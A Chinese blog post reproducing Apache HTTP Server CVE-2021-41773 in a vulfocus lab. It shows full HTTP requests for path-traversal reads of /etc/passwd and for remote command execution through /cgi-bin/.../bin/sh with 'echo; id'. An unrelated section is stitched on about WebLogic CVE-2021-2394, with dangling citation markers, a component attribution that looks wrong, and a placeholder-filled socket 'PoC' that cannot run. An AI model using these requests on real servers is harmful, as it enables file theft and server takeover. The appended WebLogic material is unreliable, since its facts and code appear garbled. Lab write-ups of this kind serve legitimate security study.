vulfocus——apache(cve_2021_41773)

本文详细介绍了Apache HTTP Server 2.4.49和2.4.50版本存在的路径穿越漏洞,攻击者可借此读取敏感文件甚至执行命令。通过复现步骤,展示了如何进行文件读取和命令执行,揭示了该漏洞的严重性。修复此问题对于保障服务器安全至关重要。

描述

Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。

攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。 

复现

1.打开靶场

2.文件读取,用burp抓包然后发送请求

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; think_template=default
Upgrade-Insecure-Requests: 1

 

 3.rce命令执行

POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 123.58.224.8:15826
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; think_template=default
Upgrade-Insecure-Requests: 1
Content-Length: 8

echo; id

 

4.上述执行成功,ls /tmp找到flag

 

### 关于WebLogic CVE-2021-2394漏洞的信息 CVE-2021-2394 是 Oracle WebLogic Server 中的一个反序列化漏洞,允许未经身份验证的攻击者通过 T3 协议发送恶意数据包来实现远程代码执行 (RCE)[^6]。此漏洞的影响范围包括以下版本: - **Oracle WebLogic Server 12.1.3** - **Oracle WebLogic Server 12.2.1.x** #### 漏洞原理 该漏洞源于 WebLogic 的 `wls9_async_response` 组件未能正确处理传入的数据流,在解析过程中存在反序列化的安全隐患。由于未经过充分的身份验证校验,攻击者可以构造特定的 Java 对象并触发 RCE 行为。 --- ### VulFocus 环境搭建指南 VulFocus 提供了一个便捷的方式来快速部署漏洞复现环境。以下是针对 CVE-2021-2394 的具体操作方法: #### 步骤说明 1. 安装 Docker 和 Docker Compose 工具。 如果尚未安装这些工具,请运行以下命令完成安装: ```bash sudo apt-get update && sudo apt-get install -y docker.io docker-compose ``` 2. 下载目标镜像。 使用官方提供的脚本拉取对应漏洞容器: ```bash git clone https://github.com/vulfocus/vulfocus.git cd vulfocus/weblogic-cve-2021-2394/ sudo docker-compose up -d ``` 3. 启动成功后访问服务地址,默认端口通常设置为 `7001` 或其他指定配置项中的值。 > 注意事项:确保主机防火墙已开放必要通信端口,并确认资源充足以支持虚拟机正常启动[^5]。 --- ### Exploit PoC 实施流程 目前公开可用的一种 POC 脚本如下所示,基于 Python 编写而成用于测试目的仅限合法授权范围内使用! ```python import socket from struct import pack def create_exploit_payload(): # 构造payload部分省略实际细节... payload = b"\x00\x00" + ... # 自定义shellcode填充区域 return payload target_ip = "192.168.1.10" port = 7001 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, port)) header = pack(">I", len(create_exploit_payload())) s.send(header + create_exploit_payload()) except Exception as e: print(f"[!] Error occurred: {e}") finally: s.close() ``` 上述代码片段展示了如何向受影响服务器投递精心设计好的字节码从而达成控制意图[^7]。 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值